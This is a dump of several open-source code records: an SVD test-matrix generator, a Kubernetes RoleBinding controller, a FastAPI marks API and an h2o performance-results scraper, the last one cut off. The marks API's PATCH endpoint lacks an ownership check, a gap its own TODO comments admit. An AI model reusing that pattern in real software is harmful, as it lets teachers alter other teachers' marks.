] | 2 | 2021-03-04T13:38:00.000Z | 2021-04-09T13:40:00.000Z | CuSVD/testcases/gen_testcase.py | praeclarumjj3/CuML | 1c812d3b07a11c3a69a284d9960058a874d97bfa | [
"MIT"
] | null | null | null | CuSVD/testcases/gen_testcase.py | praeclarumjj3/CuML | 1c812d3b07a11c3a69a284d9960058a874d97bfa | [
"MIT"
] | 2 | 2020-12-13T18:21:18.000Z | 2021-08-17T06:55:56.000Z | #!/usr/bin/python3
#########################################################################
# Generate M x N matrix of real numbers and store #
# the matrix in a file named 'testcase_<M>_<N>' #
# Parameters: #
# M :no of rows (samples) in matrix #
# N :no of columns (features) in matrix #
# lrange, urange :range of matrix elements, i.e. #
# forall 0<=i<M, 0<=j<N #
# lrange <= matrix[i][j] <= urange #
# Format of output file: #
# ----------------------------------------------------------------- #
# | M N #
# | D[0][0] D[0][1] ... D[0][N-1] D[1][0] ... D[M-1][N-1] #
# ----------------------------------------------------------------- #
#########################################################################
from random import uniform
from sklearn.preprocessing import StandardScaler
M = 1000 # number of rows (samples) in input matrix D
N = 300 # number of columns (features) in input matrix
lrange = -100000 # lrange <= element of matrix
urange = 100000 # element of matrix <= urange
# generate the matrix
D = []
for i in range(M):
temp = []
for j in range(N):
temp.append(uniform(lrange, urange))
D.append(temp)
# standardize
X_std = StandardScaler().fit_transform(D)
filename = 'testcase_' + str(M) + '_' + str(N) #output filename
file = open(filename, 'w')
# write size of matrix in first line of file
file.write(str(M) + ' ' +str(N) + '\n')
# write space separated matrix elements
for i in range(M):
for j in range(N):
file.write('%.7f ' %(X_std[i][j]))
file.close()
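# Companion sketch (added; not part of the original generator): read a file
# produced above back into a row-major M x N list of lists.
def read_testcase(path):
    with open(path) as f:
        m, n = map(int, f.readline().split())          # header line: "M N"
        values = [float(v) for v in f.read().split()]  # M*N space-separated floats
    assert len(values) == m * n
    return [values[i * n:(i + 1) * n] for i in range(m)]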
| 38.588235 | 73 | 0.399898 |
from random import uniform
from sklearn.preprocessing import StandardScaler
M = 1000
N = 300
lrange = -100000
urange = 100000
D = []
for i in range(M):
temp = []
for j in range(N):
temp.append(uniform(lrange, urange))
D.append(temp)
X_std = StandardScaler().fit_transform(D)
filename = 'testcase_' + str(M) + '_' + str(N)
file = open(filename, 'w')
file.write(str(M) + ' ' +str(N) + '\n')
for i in range(M):
for j in range(N):
file.write('%.7f ' %(X_std[i][j]))
file.close()
| true | true |
1c4a7b6fc80a80c5c89ab92e7173ca90f412ed2c | 1,717 | py | Python | examples/clusteredparent/sync.py | rahulchheda/metac | 40b547db945dd1a45cb2d62205d1c59e278bd678 | [
"Apache-2.0"
] | 577 | 2018-03-22T01:31:59.000Z | 2022-02-16T15:19:12.000Z | examples/clusteredparent/sync.py | DalavanCloud/metacontroller | 98610b6e15cbe8b6ccd3bca0928dce0ce54c548d | [
"Apache-2.0"
] | 391 | 2020-05-19T09:33:07.000Z | 2022-03-31T17:27:18.000Z | examples/clusteredparent/sync.py | DalavanCloud/metacontroller | 98610b6e15cbe8b6ccd3bca0928dce0ce54c548d | [
"Apache-2.0"
] | 117 | 2018-03-22T01:40:47.000Z | 2022-03-25T08:57:53.000Z | #!/usr/bin/env python
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import json
def new_rolebinding(name):
rolebinding = {}
rolebinding['apiVersion'] = 'rbac.authorization.k8s.io/v1'
rolebinding['kind'] = 'RoleBinding'
rolebinding['metadata'] = {}
rolebinding['metadata']['name'] = name
rolebinding['metadata']['namespace'] = "default"
rolebinding['subjects'] = [{'kind': 'ServiceAccount', 'name': 'default', 'namespace': 'default'}]
rolebinding['roleRef'] = {'kind': 'ClusterRole', 'name': name, 'apiGroup': 'rbac.authorization.k8s.io'}
return rolebinding
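# Illustration (added): for a hypothetical ClusterRole named "reader",
# new_rolebinding("reader") returns a manifest equivalent to:
#   {'apiVersion': 'rbac.authorization.k8s.io/v1', 'kind': 'RoleBinding',
#    'metadata': {'name': 'reader', 'namespace': 'default'},
#    'subjects': [{'kind': 'ServiceAccount', 'name': 'default', 'namespace': 'default'}],
#    'roleRef': {'kind': 'ClusterRole', 'name': 'reader', 'apiGroup': 'rbac.authorization.k8s.io'}}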
class Controller(BaseHTTPRequestHandler):
def sync(self, clusterrole, children):
return {'attachments': [new_rolebinding(clusterrole['metadata']['name'])] }
def do_POST(self):
observed = json.loads(self.rfile.read(int(self.headers.getheader('content-length'))))
desired = self.sync(observed['object'], observed['attachments'])
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(json.dumps(desired))
HTTPServer(('', 80), Controller).serve_forever()
| 37.326087 | 105 | 0.726849 |
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import json
def new_rolebinding(name):
rolebinding = {}
rolebinding['apiVersion'] = 'rbac.authorization.k8s.io/v1'
rolebinding['kind'] = 'RoleBinding'
rolebinding['metadata'] = {}
rolebinding['metadata']['name'] = name
rolebinding['metadata']['namespace'] = "default"
rolebinding['subjects'] = [{'kind': 'ServiceAccount', 'name': 'default', 'namespace': 'default'}]
rolebinding['roleRef'] = {'kind': 'ClusterRole', 'name': name, 'apiGroup': 'rbac.authorization.k8s.io'}
return rolebinding
class Controller(BaseHTTPRequestHandler):
def sync(self, clusterrole, children):
return {'attachments': [new_rolebinding(clusterrole['metadata']['name'])] }
def do_POST(self):
observed = json.loads(self.rfile.read(int(self.headers.getheader('content-length'))))
desired = self.sync(observed['object'], observed['attachments'])
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(json.dumps(desired))
HTTPServer(('', 80), Controller).serve_forever()
| true | true |
1c4a7b98fa5883d11c06bf2f920e1ba0096ba6ec | 5,226 | py | Python | services/backend/app/api/v1/endpoints/marks.py | moxxiq/online-diary | 5949cb5631d49622a31885519a880b17a0816988 | [
"MIT"
] | null | null | null | services/backend/app/api/v1/endpoints/marks.py | moxxiq/online-diary | 5949cb5631d49622a31885519a880b17a0816988 | [
"MIT"
] | null | null | null | services/backend/app/api/v1/endpoints/marks.py | moxxiq/online-diary | 5949cb5631d49622a31885519a880b17a0816988 | [
"MIT"
] | null | null | null | from fastapi import APIRouter, status, HTTPException, Path, Depends
import app.core.crud as crud
from app.core.authorization import get_current_user, get_current_user_with_scopes
from app.core.schemas.users import UserWithID
from app.core.schemas.marks import Mark, MarkDB, MarkContent
router = APIRouter()
@router.post("/marks", response_model=MarkDB, status_code=status.HTTP_201_CREATED)
async def create_marks(payload: Mark, current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2]))):
    # TODO: remove vulnerability where a student could get a mark for another class's work
mark_in_db = await crud.marks.get_by_work_student(work_id=payload.work_id, student_id=payload.student_id)
if mark_in_db:
raise HTTPException(status_code=status.HTTP_409_CONFLICT, detail="Mark is already set")
if (current_user.get("type") == 2) and (current_user.get("id") != (await crud.works.get_teacher_of_the_work(payload.work_id)).get("user_id")):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail="Teacher is not allowed to set the marks for other teacher works")
mark_id = await crud.marks.post(payload)
response_object = await crud.marks.get(mark_id)
return response_object
@router.patch("/marks/{id}", response_model=MarkDB, status_code=status.HTTP_200_OK)
async def correct_marks(payload: MarkContent, id: int = Path(..., gt=0), current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2]))):
    # TODO: remove vulnerability where a student could get a mark for another class's work
    # TODO: remove vulnerability where one teacher can correct another teacher's marks
await crud.marks.patch(id, payload)
response_object = await crud.marks.get(id)
return response_object
@router.put("/marks/{id}", response_model=MarkDB, status_code=status.HTTP_200_OK)
async def correct_or_create_marks(payload: Mark, id: int = Path(..., gt=0), current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2]))):
    # TODO: remove vulnerability where a student could get a mark for another class's work
if (current_user.get("type") == 2) and (current_user.get("id") != (await crud.works.get_teacher_of_the_work(payload.work_id)).get("user_id")):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail="Teacher is not allowed to set the marks for other teacher works")
await crud.marks.put(id, payload)
response_object = await crud.marks.get(id)
return response_object
@router.get("/marks/{id}", response_model=MarkDB)
async def read_marks(id: int = Path(..., gt=0), current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2, 3]))):
mark_in_db = await crud.marks.get(id)
if not mark_in_db:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Mark not set")
if current_user.get("type") not in [1, 2]:
if current_user.get("id") != mark_in_db.get("student_id"):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail="Student is not allowed to see the marks of others")
if (current_user.get("id") != (await crud.works.get_teacher_of_the_work(mark_in_db.get("work_id"))).get("user_id")) and (current_user.get("type") == 2):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail="Teacher is not allowed to see the marks of other teachers")
return mark_in_db
@router.delete("/marks/{id}", response_model=MarkDB)
async def delete_marks(id: int = Path(..., gt=0), current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2]))):
mark_in_db = await crud.marks.get(id)
if not mark_in_db:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Mark not found")
if (current_user.get("id") != (await crud.works.get_teacher_of_the_work(mark_in_db.get("work_id"))).get("user_id")) and (current_user.get("type") == 2):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail="Techer is not allowed to delete the marks of other teachers")
await crud.marks.delete(id)
return mark_in_db
@router.get("/works/{work_id}/students/{student_id}/marks", response_model=MarkDB)
async def read_work_student_marks(work_id: int = Path(..., gt=0), student_id: int = Path(..., gt=0), current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2, 3]))):
mark_in_db = await crud.marks.get_by_work_student(work_id, student_id)
if not mark_in_db:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Mark not set")
if current_user.get("type") not in [1, 2]:
if current_user.get("id") != mark_in_db.get("student_id"):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail="Student is not allowed to see the marks of others")
if (current_user.get("id") != (await crud.works.get_teacher_of_the_work(mark_in_db.get("work_id"))).get("user_id")) and (current_user.get("type") == 2):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail="Techer is not allowed to see the marks of other teachers")
return mark_in_db
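# Client-side sketch (added; illustrative only). The base URL, bearer token and
# ids below are assumptions -- none of them are defined in this module -- and the
# payload is assumed to carry the Mark schema fields used above (work_id,
# student_id) plus whatever mark value MarkContent defines.
async def _example_create_mark():
    import httpx  # hypothetical client dependency, not required by this app
    async with httpx.AsyncClient(base_url="http://localhost:8000") as client:
        payload = {"work_id": 1, "student_id": 2}  # plus MarkContent fields
        return await client.post(
            "/marks",
            json=payload,
            headers={"Authorization": "Bearer <teacher-token>"},
        )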
| 67.87013 | 178 | 0.726177 |
from fastapi import APIRouter, status, HTTPException, Path, Depends
import app.core.crud as crud
from app.core.authorization import get_current_user, get_current_user_with_scopes
from app.core.schemas.users import UserWithID
from app.core.schemas.marks import Mark, MarkDB, MarkContent
router = APIRouter()
@router.post("/marks", response_model=MarkDB, status_code=status.HTTP_201_CREATED)
async def create_marks(payload: Mark, current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2]))):
mark_in_db = await crud.marks.get_by_work_student(work_id=payload.work_id, student_id=payload.student_id)
if mark_in_db:
raise HTTPException(status_code=status.HTTP_409_CONFLICT, detail="Mark is already set")
if (current_user.get("type") == 2) and (current_user.get("id") != (await crud.works.get_teacher_of_the_work(payload.work_id)).get("user_id")):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail="Teacher is not allowed to set the marks for other teacher works")
mark_id = await crud.marks.post(payload)
response_object = await crud.marks.get(mark_id)
return response_object
@router.patch("/marks/{id}", response_model=MarkDB, status_code=status.HTTP_200_OK)
async def correct_marks(payload: MarkContent, id: int = Path(..., gt=0), current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2]))):
await crud.marks.patch(id, payload)
response_object = await crud.marks.get(id)
return response_object
@router.put("/marks/{id}", response_model=MarkDB, status_code=status.HTTP_200_OK)
async def correct_or_create_marks(payload: Mark, id: int = Path(..., gt=0), current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2]))):
if (current_user.get("type") == 2) and (current_user.get("id") != (await crud.works.get_teacher_of_the_work(payload.work_id)).get("user_id")):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail="Teacher is not allowed to set the marks for other teacher works")
await crud.marks.put(id, payload)
response_object = await crud.marks.get(id)
return response_object
@router.get("/marks/{id}", response_model=MarkDB)
async def read_marks(id: int = Path(..., gt=0), current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2, 3]))):
mark_in_db = await crud.marks.get(id)
if not mark_in_db:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Mark not set")
if current_user.get("type") not in [1, 2]:
if current_user.get("id") != mark_in_db.get("student_id"):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail="Student is not allowed to see the marks of others")
if (current_user.get("id") != (await crud.works.get_teacher_of_the_work(mark_in_db.get("work_id"))).get("user_id")) and (current_user.get("type") == 2):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail="Teacher is not allowed to see the marks of other teachers")
return mark_in_db
@router.delete("/marks/{id}", response_model=MarkDB)
async def delete_marks(id: int = Path(..., gt=0), current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2]))):
mark_in_db = await crud.marks.get(id)
if not mark_in_db:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Mark not found")
if (current_user.get("id") != (await crud.works.get_teacher_of_the_work(mark_in_db.get("work_id"))).get("user_id")) and (current_user.get("type") == 2):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail="Techer is not allowed to delete the marks of other teachers")
await crud.marks.delete(id)
return mark_in_db
@router.get("/works/{work_id}/students/{student_id}/marks", response_model=MarkDB)
async def read_work_student_marks(work_id: int = Path(..., gt=0), student_id: int = Path(..., gt=0), current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2, 3]))):
mark_in_db = await crud.marks.get_by_work_student(work_id, student_id)
if not mark_in_db:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Mark not set")
if current_user.get("type") not in [1, 2]:
if current_user.get("id") != mark_in_db.get("student_id"):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail="Student is not allowed to see the marks of others")
if (current_user.get("id") != (await crud.works.get_teacher_of_the_work(mark_in_db.get("work_id"))).get("user_id")) and (current_user.get("type") == 2):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail="Techer is not allowed to see the marks of other teachers")
return mark_in_db
| true | true |
1c4a7be7ea527484692bd99033eb1f536a3b8881 | 18,777 | py | Python | h2o-perf/bench/py/h2oPerf/Scrape.py | gigliovale/h2o | be350f3f2c2fb6f135cc07c41f83fd0e4f521ac1 | [
"Apache-2.0"
] | 882 | 2015-05-22T02:59:21.000Z | 2022-02-17T05:02:48.000Z | h2o-perf/bench/py/h2oPerf/Scrape.py | VonRosenchild/h2o-2 | be350f3f2c2fb6f135cc07c41f83fd0e4f521ac1 | [
"Apache-2.0"
] | 1 | 2022-02-22T12:15:02.000Z | 2022-02-22T12:15:02.000Z | h2o-perf/bench/py/h2oPerf/Scrape.py | VonRosenchild/h2o-2 | be350f3f2c2fb6f135cc07c41f83fd0e4f521ac1 | [
"Apache-2.0"
] | 392 | 2015-05-22T17:04:11.000Z | 2022-02-22T09:04:39.000Z | from Table import *
import json
import os
import re
import subprocess
import time
import MySQLdb
class Scraper:
"""
Objects of this class scrape the R stdouterr for
relevant information that needs to percolate back
to the database.
Because of the different phases (parse, model, predict),
there is a switch that redirects control to a subclass
scraper of the appropriate type.
Each phase will insert a row into the test_run_phase_result
table in the db, and possibly percolate pieces of the test_run
table back to the PerfRunner object.
Some subclasses of the Scraper will insert data into the math results tables.
"""
def __init__(self, perfdb, phase, test_dir, test_short_dir, output_dir, output_file_name):
self.perfdb = perfdb
self.phase = phase
self.test_dir = test_dir
self.test_short_dir = test_short_dir
self.output_dir = output_dir
self.output_file_name = output_file_name
self.did_time_pass = 0
self.did_correct_pass = 0
self.contaminated = 0
self.contamination_message = ""
def scrape(self):
"""
Switches out to the phase scraper for scraping R output.
The subclass object is then invoked and an object with
table information is percolated back to the caller.
"""
phase_scraper = self.__switch__()
res = phase_scraper.invoke()
self.did_time_pass = phase_scraper.did_time_pass
self.did_correct_pass = phase_scraper.did_correct_pass
self.contaminated = phase_scraper.contaminated
self.contamination_message = phase_scraper.contamination_message
return res
def __switch__(self):
"""
Switch to scraper for the appropriate phase.
"""
return {
'parse': ParseScraper(self),
'model': ModelScraper(self),
'predict': PredictScraper(self),
}[self.phase]
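# Note (added for clarity): __switch__ constructs all three phase scrapers and
# then indexes the dict by self.phase, so exactly one subclass handles each
# phase. A typical parse-phase call chain:
#   Scraper(perfdb, "parse", ...).scrape()
#     -> ParseScraper.invoke()
#        -> insert_phase_result()        # writes a test_run_phase_result row
#        -> __scrape_parse_result__()    # percolates test_run fields back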
class ParseScraper(Scraper):
"""
An object that performs the scraping for the Parse phase.
Relevant tables and their fields:
>test_run:
[dataset_name, dataset_source, train_dataset_url, test_dataset_url]
>test_run_phase_result:
[phase_name, start/end_epoch_ms, stdouterr, passed, correctness_passed,
timing_passed, contaminated, contamination_message]
"""
def __init__(self, object):
self.perfdb = object.perfdb
self.phase = object.phase
self.test_dir = object.test_dir
self.test_short_dir = object.test_short_dir
self.output_dir = object.output_dir
self.output_file_name = object.output_file_name
self.contamination = os.path.join(self.output_dir, "contamination_message")
self.contaminated = 1 if os.path.exists(self.contamination) else 0
self.contamination_message = "No contamination."
if self.contaminated:
with open(self.contamination, "r") as f:
self.contamination_message = MySQLdb.escape_string(f.read().replace('\n', ''))
self.did_correct_pass = 0
self.did_time_pass = 0
self.test_run = {
'dataset_source': '',
'train_dataset_url': '',
'test_dataset_url': '',
}
def invoke(self):
"""
Scrapes the stdouterr from the R phase. Inserts into results tables.
The phase result is handled in the __init__ of this object.
        The work done here is on the self.test_run dictionary
@return: test_run dictionary
"""
self.insert_phase_result()
self.test_run.update(self.__scrape_parse_result__())
return self.test_run
def insert_phase_result(self):
trpr = TableRow("test_run_phase_result", self.perfdb)
with open(self.output_file_name, "r") as f:
trpr.row['stdouterr'] = MySQLdb.escape_string(f.read().replace('\n', ''))
trpr.row['contaminated'] = self.contaminated
trpr.row['contamination_message'] = self.contamination_message
trpr.row.update(self.__scrape_phase_result__())
trpr.update()
def __scrape_phase_result__(self):
phase_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
phase_r = json.loads(line)
flag = False
break
if "PHASE RESULT" in line and "print" not in line:
flag = True
self.did_correct_pass = int(phase_r['phase_result']['correctness_passed'])
self.did_time_pass = int(phase_r['phase_result']['timing_passed'])
return phase_r['phase_result']
def __scrape_parse_result__(self):
parse_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
parse_r = json.loads(line)
flag = False
break
if "PARSE RESULT" in line and "print" not in line:
flag = True
return parse_r['parse_result']
class ModelScraper(Scraper):
"""
An object that performs the scraping for the Model phase.
Relevant tables and their fields:
>test_run_clustering_result:
[k, withinss]
>test_run_model_result:
[model_json]
>test_run_phase_result:
[phase_name, start/end_epoch_ms, stdouterr, passed, correctness_passed,
timing_passed, contaminated, contamination_message]
"""
def __init__(self, object):
self.perfdb = object.perfdb
self.phase = object.phase
self.test_dir = object.test_dir
self.test_short_dir = object.test_short_dir
self.output_dir = object.output_dir
self.output_file_name = object.output_file_name
self.contamination = os.path.join(self.output_dir, "contamination_message")
self.contaminated = 1 if os.path.exists(self.contamination) else 0
self.contamination_message = "No contamination."
if self.contaminated:
with open(self.contamination, "r") as f:
self.contamination_message = MySQLdb.escape_string(f.read().replace('\n', ''))
self.did_correct_pass = 0
self.did_time_pass = 0
self.test_run_model_result = TableRow("test_run_model_result", self.perfdb)
def invoke(self):
"""
Scrapes the stdouterr from the R phase. Inserts into results tables.
Additionally handles the KMeans clustering results table.
@return: None
"""
self.insert_phase_result()
kmeans_result = self.__scrape_kmeans_result__()
if kmeans_result:
self.test_run_clustering_result = TableRow("test_run_clustering_result", self.perfdb)
self.test_run_clustering_result.row.update(kmeans_result)
self.test_run_clustering_result.update()
comp_result = self.__scrape_comparison_result__()
if comp_result != "":
self.test_run_binomial_comparison_result = TableRow("test_run_binomial_comparison", self.perfdb)
self.test_run_binomial_comparison_result.row.update(comp_result['comparison_result'])
self.test_run_binomial_comparison_result.update()
else:
self.test_run_model_result.row['model_json'] = \
MySQLdb.escape_string(str(self.__scrape_model_result__()))
self.test_run_model_result.update()
return None
def insert_phase_result(self):
trpr = TableRow("test_run_phase_result", self.perfdb)
with open(self.output_file_name, "r") as f:
trpr.row['stdouterr'] = MySQLdb.escape_string(f.read().replace('\n', ''))
trpr.row['contaminated'] = self.contaminated
trpr.row['contamination_message'] = self.contamination_message
trpr.row.update(self.__scrape_phase_result__())
trpr.update()
def __scrape_comparison_result__(self):
comparison_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
comparison_r = json.loads(line)
flag = False
break
if "COMPARISON" in line and "print" not in line:
flag = True
return comparison_r
def __scrape_phase_result__(self):
phase_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
phase_r = json.loads(line)
flag = False
break
if "PHASE RESULT" in line and "print" not in line:
flag = True
self.did_correct_pass = int(phase_r['phase_result']['correctness_passed'])
self.did_time_pass = int(phase_r['phase_result']['timing_passed'])
return phase_r['phase_result']
def __scrape_kmeans_result__(self):
kmeans_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
kmeans_r = json.loads(line)
flag = False
break
if "KMEANS RESULT" in line and "print" not in line:
flag = True
return None if kmeans_r["kmeans_result"]["k"] == "None" else kmeans_r["kmeans_result"]
def __scrape_model_result__(self):
model_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
model_r = json.loads(line)
flag = False
break
if "MODEL RESULT" in line and "print" not in line:
flag = True
return model_r["model_result"]["model_json"]
class PredictScraper(Scraper):
"""
An object that performs the scraping for the Predict phase.
This object is not awlays used, e.g. in the case of KMeans and PCA,
there is no prediction phase, but the results still need to be
verified.
Relevant tables and their fields:
>test_run_binomial_classification_result:
        [auc, precision, recall, error_rate, minority_error_rate]
>test_run_cm_result:
[levels_json, cm_json, representation]
>test_run_multinomial_classification_result:
[level, level_actual_count, level_predicted_correctly_count, level_error_rate]
>test_run_phase_result:
[phase_name, start/end_epoch_ms, stdouterr, passed, correctness_passed,
timing_passed, contaminated, contamination_message]
>test_run_regression_result:
[aic, null_deviance, residual_deviance]
"""
def __init__(self, object):
self.perfdb = object.perfdb
self.phase = object.phase
self.test_dir = object.test_dir
self.test_short_dir = object.test_short_dir
self.output_dir = object.output_dir
self.output_file_name = object.output_file_name
self.contamination = os.path.join(self.output_dir, "contamination_message")
self.contaminated = 1 if os.path.exists(self.contamination) else 0
self.contamination_message = "No contamination."
if self.contaminated:
with open(self.contamination, "r") as f:
self.contamination_message = MySQLdb.escape_string(f.read().replace('\n', ''))
self.did_correct_pass = 0
self.did_time_pass = 0
self.test_run_binomial_classification_result = ""
self.test_run_cm_result = ""
self.test_run_phase_result = ""
self.test_run_regression_result = ""
self.test_run_binomial_comparison_result = ""
self.test_run_multinomial_classification_result = ""
def invoke(self):
"""
Scrapes the stdouterr from the R phase.
This invoke method will pass off control to the appropriate result scraper
using the __switch__ override.
Some preliminary scraping will be done here to obtain the correct result type.
@return: None
"""
self.insert_phase_result()
predict_type = ""
# with open(self.output_file_name, "r") as f:
# flag = False
# for line in f:
# if flag:
# print "---------------------------------"
# print line
# print "---------------------------------"
# predict_type = self.__get_predict_type__(line.strip())[0]
# flag = False
# break
# if "PREDICT TYPE" in line and "print" not in line:
# flag = True
# self.result_type = predict_type
# print "GOT RESULT TYPE: " + predict_type
# self.__switch__()
return None
def insert_phase_result(self):
trpr = TableRow("test_run_phase_result", self.perfdb)
with open(self.output_file_name, "r") as f:
trpr.row['stdouterr'] = MySQLdb.escape_string(f.read().replace('\n', ''))
trpr.row['contaminated'] = self.contaminated
trpr.row['contamination_message'] = self.contamination_message
trpr.row.update(self.__scrape_phase_result__())
trpr.update()
def __scrape_phase_result__(self):
phase_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
phase_r = json.loads(line)
flag = False
break
if "PHASE RESULT" in line and "print" not in line:
flag = True
self.did_correct_pass = int(phase_r['phase_result']['correctness_passed'])
self.did_time_pass = int(phase_r['phase_result']['timing_passed'])
return phase_r['phase_result']
def __get_predict_type__(self, type_candidate):
"""
Returns the type: 'parse', 'model', 'predict'
"""
print "TYPE CANDIDATE: " + type_candidate
types = ['binomial', 'regression', 'multinomial', 'cm']
rf = type_candidate.lower()
print "RETURNING TYPE: " + str( [t for t in types if t in rf])
return [t for t in types if t in rf]
def __switch__(self):
"""
Overrides the __switch__ method of the parent class.
This switch method handles the different types of math
        results: regression, multinomial classification, CM result,
binomial classification
Multinomial classification is the only case where there will
be multiple rows inserted, all other results constitute a single row
in their respective tables.
One important note is that the scrapers in this case handle the
database insertions.
"""
print "SWITCHING TO " + self.result_type
obj = {'regression' : self.__scrape_regression_result__,
'cm' : self.__scrape_cm_result__,
'multinomial': self.__scrape_multinomial_result__,
'binomial' : self.__scrape_binomial_result__,
'comparison' : self.__scrape_comparison_result__,
}.get(self.result_type, "bad key")
if self.result_type in ['multinomial', 'binomial']:
self.__scrape_cm_result__()
return obj()
def __scrape_regression_result__(self):
regression_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
regression_r = json.loads(line)
flag = False
break
if "REGRESSION" in line and "print" not in line:
flag = True
        # TODO: do the insert into test_run_regression_result
def __scrape_cm_result__(self):
cm_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
cm_r = json.loads(line)
flag = False
break
if "CM RESULTS JSON" in line and "print" not in line:
flag = True
self.test_run_cm_result = TableRow("test_run_cm_result", self.perfdb)
self.test_run_cm_result.row.update(cm_r["cm_json"])
self.test_run_cm_result.update()
def __scrape_binomial_result__(self):
binomial_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
binomial_r = json.loads(line)
flag = False
break
if "BINOMIAL" in line and "print" not in line:
flag = True
self.test_run_binomial_classification_result = TableRow("test_run_binomial_classification_result", self.perfdb)
self.test_run_binomial_classification_result.row.update(binomial_r['binomial_result'])
self.test_run_binomial_classification_result.update()
return None
def __scrape_multinomial_result__(self):
multinomial_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
multinomial_r = json.loads(line)
flag = False
break
if "MULTINOMIAL" in line and "print" not in line:
flag = True
for level in multinomial_r["multinomial_result"]:
self.test_run_multinomial_classification_result = TableRow("test_run_multinomial_classification_result", self.perfdb)
self.test_run_multinomial_classification_result.row.update(level)
self.test_run_multinomial_classification_result.update()
def __scrape_comparison_result__(self):
comparison_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
comparison_r = json.loads(line)
flag = False
break
if "COMPARISON" in line and "print" not in line:
flag = True
self.test_run_binomial_comparison_result = TableRow("test_run_binomial_comparison", self.perfdb)
self.test_run_binomial_comparison_result.row.update(comparison_r['comparison_result'])
self.test_run_binomial_comparison_result.update()
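def _example_scrape(perfdb, test_dir, test_short_dir, output_dir, output_file_name):
    # Driver sketch (added; illustrative): run the parse-phase scraper over one
    # test's R output. In the real harness these arguments come from PerfRunner.
    scraper = Scraper(perfdb, "parse", test_dir, test_short_dir,
                      output_dir, output_file_name)
    test_run_fields = scraper.scrape()  # dict of dataset fields for test_run
    passed = bool(scraper.did_time_pass and scraper.did_correct_pass)
    return test_run_fields, passed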
| 40.207709 | 129 | 0.598445 |
from Table import *
import json
import os
import re
import subprocess
import time
import MySQLdb
class Scraper:
"""
Objects of this class scrape the R stdouterr for
relevant information that needs to percolate back
to the database.
Because of the different phases (parse, model, predict),
there is a switch that redirects control to a subclass
scraper of the appropriate type.
Each phase will insert a row into the test_run_phase_result
table in the db, and possibly percolate pieces of the test_run
table back to the PerfRunner object.
Some subclasses of the Scraper will insert data into the math results tables.
"""
def __init__(self, perfdb, phase, test_dir, test_short_dir, output_dir, output_file_name):
self.perfdb = perfdb
self.phase = phase
self.test_dir = test_dir
self.test_short_dir = test_short_dir
self.output_dir = output_dir
self.output_file_name = output_file_name
self.did_time_pass = 0
self.did_correct_pass = 0
self.contaminated = 0
self.contamination_message = ""
def scrape(self):
"""
Switches out to the phase scraper for scraping R output.
The subclass object is then invoked and an object with
table information is percolated back to the caller.
"""
phase_scraper = self.__switch__()
res = phase_scraper.invoke()
self.did_time_pass = phase_scraper.did_time_pass
self.did_correct_pass = phase_scraper.did_correct_pass
self.contaminated = phase_scraper.contaminated
self.contamination_message = phase_scraper.contamination_message
return res
def __switch__(self):
"""
Switch to scraper for the appropriate phase.
"""
return {
'parse': ParseScraper(self),
'model': ModelScraper(self),
'predict': PredictScraper(self),
}[self.phase]
class ParseScraper(Scraper):
"""
An object that performs the scraping for the Parse phase.
Relevant tables and their fields:
>test_run:
[dataset_name, dataset_source, train_dataset_url, test_dataset_url]
>test_run_phase_result:
